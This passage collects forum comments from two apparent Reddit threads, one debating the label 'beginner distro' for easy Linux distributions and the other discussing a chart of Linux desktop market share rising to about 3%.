Or maybe one day you look it up, have to troubleshoot for hours and hours, you can't find anybody who is willing to help, or knows how to help, **and you're pulling your hair and teeth over your Linux issue that no one else has, but if you had used Windows or Mac, you wouldn't have those issues in the first place!!**

So here's the thing, can we please just make absolutely sure that **when we have problems on Linux, that it doesn't make Windows or Mac look better?**

That's the thing... Linux can be stable, but it's not idiot-proof. In fact, no OS can be that way. There's ways to destroy and mangle any OS. Yet, a lot of unintentional breakage is not always user error, it can be something else.

So in that case, especially with these rolling-release distros that are hip and trendy right now... these are **NOT... STABLE! Stop pretending they are.** Updates on Linux aren't thoroughly vetted like updates on Android, Mac, or Windows. Updated software on Linux CAN and WILL BREAK THINGS!

We really need more quality control for updates on Linux, or at least distos without rolling-release BS should be stable, sane, and secure. The three S's, as I like to call them. Please follow the three S's motto for any distro you use, or for any distro maker out there.

New versions of software... break things sometimes, but new features are nice, yes... New features can come with those consequences. So be patient, and use a distro with a release schedule (like Ubuntu or Fedora), and avoid Arch/Manjaro, Debian Unstable, Tumbleweed, etc... This is not a healthy Linux ecosystem in my opinion, and really should be considered more of a fad. I'm sorry if I offend people, but this is really how I feel after actually using rolling-release for a while. If you like rolling-release, good for you. I don't anymore.

Linux has its problems that haven't really been solved yet, and it pisses me off, but I deal with being a geek. And I've just come to the truth and realization that Linux will always be an operating system by geeks, for geeks.

I guess the closest user-friendly distro is Linux Mint, Pop_OS, Zorin, and Ubuntu ones. Still... gotta use the terminal sometimes. Hahaha. Better get used to it, nerd. Good luck getting help on your issue and learning the ins and outs of your OS, even though you don't want to. Computers suck, but so do we. :)
Let's call the easy-to-use Linux distros "user friendly distros"

The ones where you have to do everything from scratch and are a pain in the ass to use and maintain can be the "masochistic nerd distros"
Just don't tell me that arch isn't user friendly. It simply caters to different users.
[deleted]
But people *should* put effort in to learn Linux. Not to the point that everyone's installing Linux From Scratch, but the effort to build a decent foundation. What the package manager is, what root privilege is and when it's expected to be used (in the hypothetical year of the Linux desktop, more people would target Linux like how the script kiddies target Windows now), what dot files are and how to access them, and a few more things.

Selling someone on the idea of Linux when they're used to Windows or Mac based on the idea that they won't have to learn anything just sets them up for disappointment. They'll get 5 minutes in, try to download Microsoft Office from the website, say "The exe isn't working, Linux sucks" and go back.

Driving people away by making Linux seem harder than it is is bad, but pretending there's no learning curve is also bad. When I first installed Linux, I looked up what a good beginner's distro was because I was a beginner, and I got recommended Linux Mint, which was good. And when I encounter beginners who are interested, I recommend it as well. Because beginners isn't meant to be derogatory or intimidating - it's just true.

Edit: Also, not saying "beginner" distros are only for beginners. Just beginner friendly. Linux Mint is great for beginners and experienced users alike.
> we shouldn't make people think it's something that YOU need to put effort into understanding 

It is though. Every OS requires effort to learn, and Linux requires more than both macOS and Windows. You can argue how much more, but it is objectively more.

> that you can be "good at linux" 

You can. That's how people get jobs.

> and belittle people who like linux but wouldn't be able to code up the entire frickin kernel and a window manager as "beginners"

Just stop, dude.
I'd propose we refer to "advanced" distros like Arch, Gentoo or NixOS as "hacker" distros.

This way it's clear they're meant for a different group of people.

We still need a good word for the more use-friendly distros that encompasses the fact that they ship with most basic things you'd expect from a desktop.  
We also need a term for distros like Endavour that are an intermediary between the two; shipping some things but expecting a certain level of experience. Referring to these as "intermediary" supports the extremisation implication.
Desktop distro would be a better term. Desktop, Workstation, Server
Agreed.  Been using linux for 20+ years.  Currently very happy with the 'beginner distro' Mint Cinnamon.
Beginner should be replaced with thoughtfully designed and intuitive.
This isn't the issue. I'm someone whose workflow will not allow me to switch to linux fulltime anti cheat software for my school will not run on linux. I had a Mac since 2009 and thousands invested in iTunes which I can only access on Windows or MacOS. I can't just switch and call it a day. My schools anti plagiarizing software also means I have to use MS word. So for me at this point WSL on Windows is the closest I can get to running Linux. If I did run Linux though it would probably be POP OS just because it has good funding and decent developers behind it I guess you could call pop a beginner Distro but that doesn't bother me it would bother me if I had to do an Arch, Gentoo or even LFS build on everything just to run Linux.
yeah, I've been using Ubuntu and it's derivatives since Feisty so I wouldn't be classified as a beginner, but I like how things work in Ubuntu, I'm very familiar with it's quirks, and using a tested and stable OS is not just for newbs.
The problem is that the userbase is split into two types of users. The sys admins and the rest. Sys admins work with the OS. They get into the guts and fiddle with every little thing. To them the OS is the point. Manual config and recompiling everything is the point.

The rest of us work ON the OS. The OS is a platform on which we run our applications to do our work or have our fun. Generally we don't care about what the OS does or how it does it, so long as it works. And we would prefer that it works with the minimum of input from us users. There is no reason for such a user to choose an overly complicated distro as any fiddling we have to do with the OS itself distracts from what we really want to be doing.

Historically sys admins and similar have been the majority of linux users. So it has made sense that lots of complicated distros have popped up, and within the group a "user friendly" distro is seen as the mark of a user who either doesn't care enough about the machine to be a good sys admin or is too dumb to do the job. It never crosses their minds that most people are simply not interrested and are in fact NOT sys admins at heart and wants to do other things with their time.

As the user base shifts over time this is changing.

Also the "I hand compiled my distro using tweezers and a magnet" crowd are largely just young people stuck in a one-upmanship competition. as they get older and more experienced they too get sick of constantly tinkering with every little thing and want things to work from the start so they can focus on their actual work.

Even a master carpenter will sometimes buy premade furniture because they can't be arsed building every single thing they own from scratch.
I like the term 'plug-and-play', because Mint, Ubuntu, et c. are *fantastic* at booting, and just working.

I look after five computers running Void or Arch, and each one gets built, piece by piece, to do just the jobs they do.
I think it's strange to take offense to the term, I refer to friendlier distros as beginner distros because they are distros that beginners would find more approachable. When someone new to Linux is looking for a distro, they probably aren't using keywords like friendly or casual in their google search, they are using keywords like beginner and newbie. At the end of the day it doesn't really matter, you can take Ubuntu, drop gnome, install dwm and live in vim writing C while admining a fleet of servers and playing CTF on weekends and you're still inherently using what most people would consider to be a beginner distro. Stop looking at it from the perspective of "I want to be taken seriously" and start looking at it from the perspective of "I'm proud to support a distro that most people switching to Linux will call home for at least a little while".
'We' never did.
Imho this works both ways. As an Arch user (btw) I feel like it's very wrong to say Arch is for intermediate/advanced users because I feel like the cli experience is actually easier than in other distros due to pacman being a quite simple package manager and the documentation never assuming what DE you're using. The terms beginner/intermediate/advanced levels should be used for tasks (create your first bash script, compile the linux kernel, set up your own vpn...) but "user friendliness" sounds a lot more accurate for describing distros.

Newbies may think things like "This distro is rated for advanced users, then I'm not ready for it" or the exact opposite  "People say this is a beginner distro, does this mean I'll need to switch distro at a certain point? I may have troubles if I get used to this one and then have to switch. Should I start with another one instead?" and then proceed to install Kali.

Thanks for bringing attention to this, I'll definitely pay more attention to the difference between beginner level and user friendliness.
Funny, my "it just works and I don't want to mess around anymore" moment was when I tried OpenBSD.

That is, the "user-friendly" things feel cozy and I understand people who want to just use them.

But somehow for me, (if using Linux) Void is convenient.
Ok, I will stop it
If you break down Windows users y'all  probably get 90% of 'em who don't use their Windows for anything more than surfing the web, online shopping, social media, email - all the stuff you taught grandma / grandpa how to do with their computer. What makes anybody think that the majority of new Linux users want or need to do anything more than the typical Windows user? I've sold a lot of desktops and laptops with Linux Mint and Kubuntu installed, mostly with KDE,  to novice computer users and never got one complaint about it being too difficult. 'Casual user friendly' - Linux beats Windows hands down if you're talking about distros Like Mint, Ubuntu and its derivatives that work right out of the box. You can go down a rabbit hole in Linux (Windows too) where you can get hopelessly lost, but the folks who do that are usually the type of user that wants to explore rabbit holes anyway.
Fedora, Ubuntu and a select few others are solutions to a problem, not problems in of themselves like most distros. Better things to waste your time on if you want to spend your maybe 90 years on this planet accumulating social-awkward IQ superiority points.


Just think, if you become apathetic enough you never have to engage in another completely unoriginal argument about systemd ever again, and can spend the time drunk/high/enjoying stuff/working on something/all of the previous at once


Yet you still get to enjoy the only desktop computing platform that doesn't put kid gloves on you, good against viruses, ergonomic for poweruser and developer (and just in general, imo UX of both KDE and GNOME is underrated compared to some of the insanity on Mac (window management, some hotkey combos are flat out stupid unergonomic) and windows (frankencontrolpanel, disfunctional desktop search)), plus you don't have to look at all the horrible doomer misery-news feeds they've shoved in the other OS's, let alone the tracking and whatever other horrors have been added in last 25 minutes. And its all free :) 

Linux is actually pretty great if you stop fighting it and enjoy it as developers intended.
I basically agree, but don't really care that much how they label the distributions. I've been using Linux Mint for about 14 or 15 years now. So I'm not really a beginner. I'm also not a developer. I just use Linux Mint every day as my OS. So maybe "user friendly" would be better. But I also see why they want to use "beginner," when  trying to get Windows or Mac users to try it.
I see where you are coming from. I've always found it a bit of a misnomer myself to call a distro "Beginner Friendly" as from my experience it's just a case of finding a distro that works with your workflow. Personally I like Fedora KDE Plasma, I find it works best for me personally. I don't know why and I am not trying to start anything when I say this but I tried other distros but this one just worked best for me on my setup. It's ironic really because people say it's for experienced Linux users but me as someone who up until now hasn't had much more interaction with Linux other than trying it out to test hardware I just went into it expecting to get my arse handed to me but it has been quite the opposite. Not saying it's fool proof but, well, it works for me so... Yeah, just try the distros that interest you and see what fits for you.
well i start off with ubuntu, and not being a tech-savvy type of person, i would go for those that advertised themselves as “beginners” 😂😂😂 I dont want to be faced with a steep learning curve after all.
There aren't any user friendly distros. There are only user friendly DEs
I think part of the reason why people call them beginner distros though, is that once you get comfortable with Linux, your world of choices open up. Whereas with macOS or Windows, there's no 'beginner' anything. The OS is the OS and it works how it works. You have very little control over it.

With Linux, once you understand the basics, you can start making all kinds of choices, and that's where other distros start to shine.

*They're not called beginner distros because the people who are using them are stupid, they're beginner distros because once you learn the basics, the world becomes so much bigger.*
>when in reality it should be doing as much as possible for the user.

This is literally what 'beginner distros' do.
"accessible". There, wasn't hard
But they should be putting in an effort to learn their new tool.  It’s like saying telling them they don’t need to read the manual that comes with their new drill.
You all made excellent points so here is my view on the topic now:

A user friendly distro should be the norm. It should be self explanatory and easy to learn. Many are. Calling them "Beginner distros" creates the impression that they are an entry point for learning the intricacies of linux. For many they are just an OS they wanna use cause the others are crap. Most people won't want to learn Linux and just use it.
Btw I get that "you can't learn Linux" was dumb you can stop commenting abt it
User-friendly is a complete subjective matter imo
The fact that arch is the 1st or 2nd most popular distro on steam surveys does not bode well for mainstream adoption.

We also need a more universal binary package format. Flatpaks and snaps are an improvement but that's still segmentation.
    If we want people to be using Linux instead of Windows or Mac OS

Why would I give af what others use?
Yeah, that would be great actually. No one wants to use linux, no one wants to learn new things. Especially when they are being belittled by others.
I totally agree. There are experienced linux users, who stay away from "beginner-friendly-distros" only just because they dont want to classify themselves as "beginner". Just as there are others, who think that Arch would be no more Arch if it had a graphical installer.
Hey, I’m a data science student, only one rung down from developer in the programming hierarchy, and I use Ubuntu. I don’t have time to write my own window manager, or even configure one, because I’m too busy learning Tensorflow and CUDA. I’m also teaching myself C, but that’s only for learning purposes. In my opinion, we in the Linux and open source community need bugfixes and documentation *far* more than we need yet-another-WM or DE.
Absolutely agree!

Even I as an enthusiast prefer "beginner" distros as it makes my life easier. Better out of the box experience should be the main priority of Linux distributions above anything else imo.
> If we want people to be using linux instead of Windows or Mac OS

Why should we care? I honestly don't! :)
When you first learn to ski, you are pointed to the beginner slope.
When you're first starting to hike, you're pointed to the beginner trails.

There's nothing wrong or shameful about being a beginner, nor about being the thing that is accessible to beginners.  You can spend your whole life on the beginner slopes and still have a blast.

If "beginner" bothers (the rhetorical) you, I hope, for the sake of your ego, you never try to learn anything new, because hoo boy, that's gonna leave a bruise.
I don't _want_ anyone to used Linux, just like I don't want anyone to use Mac OS or Windows.

People should use what's right for them.

If people find their way into Linux using Ubuntu, let them fill their boots.

If someone is new to something, why would they not want to use a beginner variant of something?

I'd argue Ubuntu is what just people would call a beginner distro purely out of its ubiquitousness, but I use it as my daily driver, and I've been known to "code up a fricking kernel" every now and then.

I feel like getting hung up on things like this is just such a massive waste of everyone's time. You can't control how people interpret things.
I can but I won't. But you can if you want, though.

I'd say that moving from another OS to Linux is harder than starting directly in Linux because you don't need to unlearn.

With that out of the way, I don't see why you think calling a user friendly distro "good beginners distro" is a bad thing. Advanced users can also use it, however there are some other distros where a new user would have a harder time: Debian, Slack, Arch, etc.
I personally use the term “casual user friendly.” 

Probably 80-90% of users are casual users. They might be new, they may have only basic foundational knowledge, they may only want to spend so much time learning an OS, or they just don’t care what distro they use. Either way, a mainstream casual distro will be best for them. 

The rest would be a mixture of advanced/power users, eclectic users, picky users, and specialty users, and there are alternate distros that suit these users better. Generally these groups will seek such distros out on their own.
I don't think many will think that just because a distro is suitable for beginners, it's somehow unsuitable for people who have been using them for a long while. The idea that you become more familiar with software (or any other product) after using it for a long time is very well known.
It would be nice if linux distro's supported Broadcom drivers, Ubuntu being the exception
I've used Linux since 2000. Started with Red Hat, ran Mandrake for a couple of years and to name a few, ran Suse, Mepis, Antix, Debian, Slackware, Ubuntu, and currently run Mint. 

I love Linux and prefer something quick and easy to setup these days.
I find Debian very user friendly.  Which is why I recommend it as soon as I think people can handle it.  But, if they don't know the first thing about how Linux deals with hardware or software, Pop!_OS or Ubuntu are easier to use while you learn.

*something* In the Beginning was [the Command Line](http://garote.bdmonkeys.net/commandline/index.html) *something* Hole Hawg *something*
I am an avid computer dude, built multiple PCs in my time and even I am intimidated to use Linux but I’ve always wanted to. What’s a great one to start with ?
 preach!
Ha for sure.  If it isn't user friendly I won't begin to use it.
Been using Arch for a long time. I upgraded my pc and decided to use Ubuntu. 

Why? Because been there done that. I started it out with Arch to learn more about Linux, but now I have nothing to gain from wasting an hour or two installing an os.
You have to start somewhere, learn, and work your way up to where you want to be -- just like an entry level job, you become more skilled as time goes on.

I think squabbling over the naming is counterproductive, you have to start somewhere and that is the **beginning** (IMHO this makes it clear to new users, to call it as such).
>we shouldn't make people think it's something that YOU need to put effort into understanding

Except it IS something that you have to put effort into.  I have been using Linux for decades and I have never found a distro that works 100% out of the box exactly like Windows. Usually this is because I have to install some non-free software, or I need a work around for some Windows application, or there's simply no Linux version of certain software, or updates break the drivers on aftermarket hardware, etc.

&#x200B;

I like Linux but there are some Distros which are easier to get the average user using; either because they have mainline development support (Ubuntu) or because they're rigorously tested (Debian), and then there's distros where you have to configure most of it by hand (Arch).

So there definitely are distros which are more beginner friendly because that have 80-90% of the things a user needs right after a fresh install and that user doesn't have to try and figure out things like adding in new drivers because they bought a USB wi-fi card on Amazon and want to use it on their laptop.

&#x200B;

And this isn't even counting how easy it is to find help and support articles for certain distros
what's wrong with the term "beginner distro"?

"Distro XXX is great to **begin with**, and you can always extend it to your needs."
I never understood the need to make Linux beginner-friendly. If you need Linux, you will learn Linux due to necessity. If you don't need Linux, why use it?

And why is it that everyone thinks one has to  "code up the entire frickin kernel and a window manager"? You *can* do it, but why would you?
Same goes for Windows. You *can* use powershell and regedit.exe to configure everything in Windows, but why would you?
No, next question.
No.
Its the other way around. Can people stop calling beginner distros "user friendly" distros?

I find an OS very user friendly if it has good documentation, decent manpages, a command line installer (so I can do headless installs via serial) and no desktop environment by default so all package dependencies aren't tainted by this use-case.

I find bloated GUIs like Gnome 3+ and KDE 4+, non-deterministic auto updates and all that junk very user ***un***friendly in fact.
Installing and using Linux is greatly simplified! To speak thus, you have not known SuSe 9.2, Debian 5, yes it was hairy, difficult (the Debian x server not installed by default). Everything is automated, well the laptop is and remains delicate, but everything is in the box, for a standard installation.  
  
On the other hand, yes, the new one has to do his learning, as under the other OS, it's normal, isn't it?
How do you know which distro to use if you want to learn and use Linux? I have a spare laptop and really want to learn, but I lack the ability of figuring out where to start...especially when it comes to something like this :/
if youre not installing arch linux or gentoo without a monitor installed you're a casual
To many people push more advanced distros and cause newer users not advanced enough or comfortable enough to use them this causing them to leave Linux. 

If you aren't comfortable with configuring a system with a terminal, go something that eases you into it. There should never be any shame.
There’s no beginner or advanced distro, in the end it all can do the same.
We call them "beginner distros" because they're good for beginners to dip their toes into Linux. They usually come up like this when beginners ask for a beginner friendly distro. You can keep using them after you're not longer a beginner, they'll work just as well as any other distro. I'm still using Debian as my daily driver, and it's pretty beginner friendly.

Why would anyone care about this? Do what you want, ignore other people's criticisms, or expectations for you.
The thought that you need to be “good at” an what’s supposed to be simply an operating system is quite absurd. This is where Linux loses most people.
I've been on Ubuntu/xubuntu/kubuntu since 2005.
Some distros just are more noob friendly than others.
I feel like I'm pretty good with Linux and I'm still rocking Ubuntu on all my PCs. I save more difficult tasks for VMs in my lab or spare hardware and do it just for learning and fun.
Haha.

You know, if someone said they were going to give their Mum a laptop with Linux installed, I'd tell them to install Linux Mint and have done with it.

But if you asked me what I think is best, I'd go more along the lines of Manjaro, EOs, or Arch with KDE desktop.

Then I'd advise them how they can pimp out their terminal and use it to help them to learn more.

There are great things you can do to set up your terminal to be very 'noob' friendly (I especially enjoy my brilliant history functions, extensive alias commands, and the way that hitting 'space' after typing an alias will bring up the complete text in the terminal like this: https://i.imgur.com/ZrHXoei.png

Both are user friendly, however Linux Mint is ultimately more of a Beginner friendly distribution (as Ubuntu was some ten years ago).

There are heavy predjudices, however, built up as we encounter difficult customers.

I find Windows to be the most difficult OS to use, beyond the superficial click interface I get lost pretty quickly... but using the term 'beginner friendly' basically calls up the question of what NEW linux users find to be the biggest culture shock.

You know, having to learn how to use VIM or NANO when you only ever used GUI text editors before (though now we have MICRO which is massively brilliant for NOOBS like me who only used Linux for 10 years :P )
Well they ARE beginner distros




Distros that are suited for someone that begins in Linux
The age old question of abstracting most things for an user-friendly experience or not doing so and making it a tweakers dream. We are lucky that Linux provides that and everything in between.
Yeah, and I don't think the expectation should be there. I have a custom config set up with Qtile, and I tried running mainline Arch, but there was so much missing and so much to set up, that in the end I gave up and just used ArcoLinux where everything works okay with my config out of the box. And I don't judge people for using Ubuntu or Fedora, or Mint. Heck, I came from Mint to Manjaro, to Arco, to Arch and back to Arco. Right now, I just want to try a bunch of distros, because there are some things that some distros do better than others. For example I LOVE the fact that Fedora supports secure boot and the fedora boot up screen. It makes the distro look so polished. Unfortunately, the not-polished Grub menu, the awful UI of the installer and the issues I had with my config requiring further set up. So I'm sticking with Arco, but I can totally understand people like different distros and I can see why.
I absolutely agree on the treating user friendly distros as normal, but I can't imagine a Linux experience without learning, even just passively by using it. It's one of its distinguishing points: you get to know what your computer actually does. Anyway, as I said, I'm a huge supporter of your initial claim.
I know 1200+ gentoo packages by name.
Can't say them all at once but I can use all of them when needed
PopOS by system76 & Manjaro are beginner Linux Distros
NO, wanting to have something that just works is illegal in the linux community, you should be shamed for it 

&#x200B;

&#x200B;

&#x200B;

&#x200B;

/s (but realistically everyday there's people here saying things like this without the /s)
I think Suse, Debian or Redhat could be "beginner" linux distros.  And I think they can accomplish any task an "expert" might need.
I think this is something relevant to all hobbies really. Everything that would be recommended to a beginner gets labeled as 'beginner' even though there isn't really a thing as 'beginner'. I think overcoming it starts with people clarifying that there isn't any beginner distros, just distros that are more out of the box like they'd find with Windows and Mac.
I call them begginer friendly distros, and honestly i dont care who uses what distro, since linux is linux aand i understand if people wamt a just works distro
I think that user friendly distro should be the norm.
I would rather call the others "needlessly complicated distro". As you said, an os is a tool to use other tools, normal users shouldn't have to learn anything, it should be straightforward to use with just basic logic
I'm a Linux user since '94, having started out with Slackware back then, then went to Red-hot and to Debian after that. I've never ranked the distros by their "user friendliness" nor given anyone pro or newbie points by the distro of their choosing. 

I have however been a bit amused by people, who see me installing Ubuntu as a desktop and then try to sell me what they think of a "real" professional's distro so I'd "learn how Linux actually works".
I help administrate a large academic HPC (I'm not a sysadmin, am on the research / development side) and our default image for booting up a VM for basically any task is Ubuntu because it works.... 
I'm sure there's a few people who know linux better than our sysadmin but there aren't that many and they certainly don't shit on Ubuntu.

“beginner friendly” in my experience usually means you don’t need to put in effort to make it work. Most people just want it to work. Maybe we should not talk about beginner friendly. Whenever you would say “beginner distro” say “well designed distro” instead. 

I’m mainly using Debian with i3, for my own stupid reasons, but that doesn’t make me super nerd god compared to my wife who has pop os.
Everyone knows, in order to be considered a real Linux user, the distro you use has to be overcomplicated and time-consuming to do even the smallest of tasks.  


I mean, if you don't use the command line to do every possible thing, and you're actually using the UI...can you even call yourself a Linux user?
I fully agree. I was still in high school when I tried my first Linux distro (Mandriva). Back then, my computer skills were limited to using the Mac at school for homework.

During the setup of Mandriva, there was a lot I didn't understand, but it had some self-explanatory wizards with reasonable defaults that helped me get started. KDE 3 was already quite mature then, which was enough to help me explore and make me at home. And this is how I used my computer for many years. I didn't know anything about config files or packages or repositories until almost a decade later when I set up my first developer environment on some server. In either case, the OS is just a tool and I like tools that help me complete my task without having to know how they work. A good experience is a frictionless experience.
Honestly, I use arch not because I have a hardon for difficulty, but because the repos have so much stuff and it's so easy to manage, **given you suffered through the installation and got a system with basic functionality**.

The problem with arch (but it's also what it strives to be) is that it's too minimal in the sense that a default install could leave you with a lot of stuff missing. I had to search the web for some 10 minutes to learn I didn't have a slow connection or bad DNS settings, **it was the systemd-resolved that wasn't enabled by default so I didn't have any DNS cache for 5 years!!**

I'm considering migrating to fedora eventually, but I love me some system tinkering and bleeding edge, so I'll have to stop doing that :)
My first distro was Ubuntu 8.04 Hardy Heron. Along the way, i picked up Arch Linux and maintain for quite sometime. These days, my main machine is running PopOS due to the user friendliness and simplicity.  Sometime i dream of getting Arch running again but, i dont have the time to fiddle with installation iso around anymore. Anything that works will be just fine, be it a beginner distro or not.
Let's call them Marijuana distro.
And Arch can be called Heroin distro. Lol
Yeah. I can agree with calling them "casual distros".
I've met so many people who think that Linux itself is like a  programming language that takes years of practice to even be able to use for anything at all.

We need people to understand that you don't need to learn to code or memorize commands.  Within reason, you can take all the stuff you were working on on a Windows or Mac machine and transfer it over to Linux and just keep working from where you left off with little change.

Sure there's the obvious software compatibility issues, and sure some people aren't going to like the fact that LibreOffice is not Microsoft Office, but most people who know how to use MS-O will be able to quickly figure out LibreOffice at least enough to remain productive.

To most people, their computer is more like their car, they don't really care about anything other than "does this expensive thing I bought do what I need it to do?".
I love you and thank you. Why's everything gotta be a crawl up the tower, for the sake of a lonely crow's nest? Mucking about computer-land is more like a trawl through the dungeons, for me.

I appreciate much of the comments in this thread, dissents, too. I'm not so concerned with the semantics, really, but it's good to have this discussion.
Ryu vs. Ken
I use KDE Neon, btw.
If I can't plug in a dock and get 2 external monitors to dock with 1 year old hardware.... it's not a beginner distro. 

Incidentally, by that metric Mac Os isn't a beginner distro either :)
Gentoo was fun but i absolutely hated dealing with dependency hell in addition to waiting to compile the package before it installed it--depending on what laptop i was doing this on (my T430 or any of the older shitboxes I have) this was anything from thirty minutes to a whole ass day to get done

&#x200B;

Void just made it easier for me.
I mean if anything we say or do feels like gatekeeping then isn't that non-Linux users just policing Linux users at this point because they feel inferior or inadequate? Seems like at this point we are just reaching for the opposite extreme because we don't like the other one.
This is certainly in part thanks to the professional level KDE and Gnome have reached. The kernel developers and the thousands of amazing free software like Wine, Krita, Blender, OBS, Vulkan and many more

Source: [https://gs.statcounter.com/os-market-share/desktop/worldwide/#monthly-202201-202212](https://gs.statcounter.com/os-market-share/desktop/worldwide/#monthly-202201-202212)

[Jan 2022 vs Dec 2022](https://preview.redd.it/63uqsduzm7fa1.png?width=1225&format=png&auto=webp&v=enabled&s=5f522589c4c7985620b49d0f9b87e2d577890857)

Windows [reference](https://imgur.com/a/f9Clnjd) Jan 2010 - Jan 2023
It's the year of the 3% Linux desktop! At last...
I don't think KDE and Gnome have revolutionized their desktops in the last year. A much bigger driving factor is probably the Steam Deck, because it has shown lots of "non-Linux people" that their games work on the Stem Deck (and thus on Linux) after all, and that taking that leap of faith might be far less of an obstacle than they thought.
Excellent news. Linux should completely control the desktop space by 2525 at the latest.
if you see the chart from 2009 till now one thing is apparent, it's all microsoft's fault, they reigned all by themselves until 7

but they have been sabotaging themselves for so long with stupid decisions that more and more people are getting fed up with them and their bullshit
I've finally moved to Linux as my primary OS with a new build last week. Dealing with docker issues in Windows was getting intolerable for me and I'm looking forward to using all of the profiling tools that work on Linux but not Windows.
Biggest Windows decline comes from Macbooks. The M1 and M2 are beasts. Who does not want a silky smooth experiance with 18 hours of battery life?
Switched over to Linux Mint this past month and I've been loving it. Lots of things I want to learn and implement right now.
I think each year the regular user uses the computer and laptop less and less. For the regular user a cellphone and tablet is enough. I have a lot of friends that doesn't use computer anymore. This helps linux usage, we, the nerds, won't stop using the computer because it's our way of survival (coding etc). So all in all, less windows computers, more macbooks and linux. I think Window Subsystem for Linux and the Surface laptops are Microsoft ways to try to bring professionals back to Windows.
where do I get this Unknown OS Desktop? 

link please

:)
I might only presume that more techies are jumping into Linux for frequent use or daily  instantly connected computers.

The problem is that it's Windows getting kinda troublesome in terms of being bloated and requiring activation. So people might use Linux just to do their limited tasks and then get back to windows or discover how to activate it permanently with "cheap keys" or other means that involve installing Linux virtual machines.

Pity FreeBSD is almost white noise today :-((( From the Free UNIX roots to a dim far star in the Internet universe.
I'm an IT tech; break fix with 30 years. Last year i replaced both desktop systems at home, old windows 7 kit, with some Dell Optiplex i5's. At the same time i switched to Ubuntu and it's been about 8 months now. To think i hesitated. Stable, fast and reliable. I only social domestic at home so it just works. I watch with interest as Linux based systems gain ground in the market and I’m pleased I’m part of that statistic. I have also been actively converting suitable clients. I work with windows on a tech level everyday but it’s still feels strange how little maintenance I have to do in Ubuntu. It just works and I love it, never ever going back.
Actually we don't know the reason.

As a primarily Windows guy, I'd say the reasons (from my perspective) is the stupid Win11 upgrade requirements, as well as how good [WSL2](https://en.wikipedia.org/wiki/Windows_Subsystem_for_Linux) is at easing people into the Linux ecosystem.

Thanks to that, I had migrated from Powershell to Bash, and moved my development environment from Windows to Docker & Linux.
Is this counting steam decks?
Lets all be frank here, Linux is a lesser known OS among the "normies"... considering how Linux it self is less known. What are the odds that some cabal of OS elitists are all using some kind of "other", "unknown" underground OS and they all comprise a larger community than Linux it self.

I'm pretty sure the 4.78% are all various Linux distros. Which makes Linux about  ~~14%~~ 9%^(Mistake TM) market share... To me it sounds logical, I see the same amount of activity in the Linux community as there is in the macOS community and they both feel about the same size. Its the impression you can get if you search for Linux or macOS terms on google, you'd find forums with almost the same amount of active users.

I could be wrong... and maybe there is some underground OS, and they're all very secretive about it.
Over 5%. Chrome OS is linux.
I'm interested with the breakdown of the "Unknown" part.
I think Valve deserves some credit.

Which isn't to say they're entirely responsible, of course, but gaming was a "hold back" for a significant number of enthusiasts.
One thing I see is that Linux is now used a lot more in technical applications, like automation systems and mechanical engineering / mechatronics. One move of Microsoft was to abandon Windows CE, which made it really hard for vendors in that realm. Also, there are increasing security concerns. 

I think the Linux community should go for that, for example by providing real-time messaging infrastructure like d-bus tailored for such systems. The only thing is that companies do not want to pay for that, which is just greed.
The De are good. Whats lacking is Software in general, Like the Default Apps are worse than OSx and Options are more Limited than Windows.
Now that Windows has perfect Linux Integration Linux would need a preset easy way to deploy a passthrough Windows VM to get ahead.

With that in place Desktop Share would spike because ppl could use the great User experience of Gnome or the insane productivity of i3 ect...

Anyways, 3% is what IT IS, i Lack the time to really work on an ansible role to deploy passthrough therefore i cant complain.

Lets just hope that Gnome and kde Team keep the good Work going!
2023 - the year of Linux Desktop
It's Linux or nothing for me. That's how much I despise the alternatives. I hope the userbase will continue to grow.
I remember when Mac was 3% !!!
Anyday now.

https://youtu.be/nUsDk8wjRPs
Also, you can actually buy a pre-built computer with Linux. 

Dell, HP, to System 76 and others. 

Some decent marketing push and we may even start to push past Mac. I'd expect the biggest hurdle Linux has is being completely unknown to the 97% of the market.
These numbers always surprise me. I think half the people I know run Linux.
It would be interesting to see where the most use is. I suspect it might now be in the BRIC and developing countries.
Even though I have been using Linux since the late 80s I finally moved over in October 2021. Never looked back.
I would honestly be happy with about 10 % share of Linux desktop. At that point, it would be difficult to ignore Linux.
Longterm Windows fanboy here. 6 years ago I switched to Mac. 2 years ago I switched to Ubuntu. I’m here to stay.
Back in the glory days of British cotton manufacturing someone once said how much wealth could be generated if only the Chinese could be persuaded to make their shirttails one inch longer (the British were early appreciators of the size of the Chinese market, for more than just cotton)

These days, Linux market share is waiting for the CCP to get rid of windows, which it has been promising for twenty years.

It might be more likely in India, where desktop Linux share is much higher than the global average
There is still no clear proposal from main Linux players about future of the Linux GUI foundation and long lasting backward compatible graphic libraries.
Linux is under represented due to a lot of Linux users modifying their user agent string to access web services. 

For instance I am posting from a Raspberry Pi but my user agent looks like this:
Mozilla/5.0 (X11; CrOS aarch64 13597.84.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.105 Safari/537.36

I bet the actual number is double.
Unstoppable!
Percentage increase vs others doesn't necessarily reflect adoption rate. I'd be more interested in adoption rate.
I think windows 11 has also helped linux a lot. It ran horribly slow on my ryzen 5600h system, especially the windows explorer was borderline unusable and offcourse i there is all the telemetry bs and forced updates. I already ran linux on my htpc nuc and my secondary laptop (thin and light zenbook) so i decided to switch my last pc (lenovo gaming laptop) over to linux as well. so thats one more fulltime linux user. 
The influence of the steamdeck should also not be underestimated and ofcourse the work Valve put into steam and proton. I mean, like literally all the games i want to play just work, not always as smooth as on windows but good enough to not switch back. That's quite the achievement. Its mind boggling how far linux has come as a desktop OS. I still vividly remember the dependency hell back in the Corel linux days and horrors of the first installs of Debian on my 486...
2023 is the year of the Linux Desktop
I attribute this to Linux friendly laptops. I wouldn't trade mine for a Mac Pro.
Gotta pump those numbers up.   Those are rookie numbers.
who actually cares?
1. "desktops" are becoming a thing of the past. I think we should start using the idea of "personal computing device" which in addition to desktops should include, laptops, tablets and smartphones.
2. By Linux market share we need to understand OS that run on Linux kernel, this includes  Android and Chrome OS. If you add all those up Linux is the dominant OS on the personal computing devices.
>This is certainly in part thanks to the professional level KDE and Gnome have reached.

Definitely not. I don't think I've ever worked with somebody that liked either of those over one of the other more lightweight options.
Kids nowadays are basically born with a computer, so the transition between OS isn't as difficult or scary to them as it was for older generations. Linux has also improved tremendously in the last 5 years. I expect things to improve with each passing year.
Cleaning up after bill gate$, 25 years later...
oh shit chrome os number is seems really big.
[deleted]
Just today I installed fedora workstation 37 on a PC.

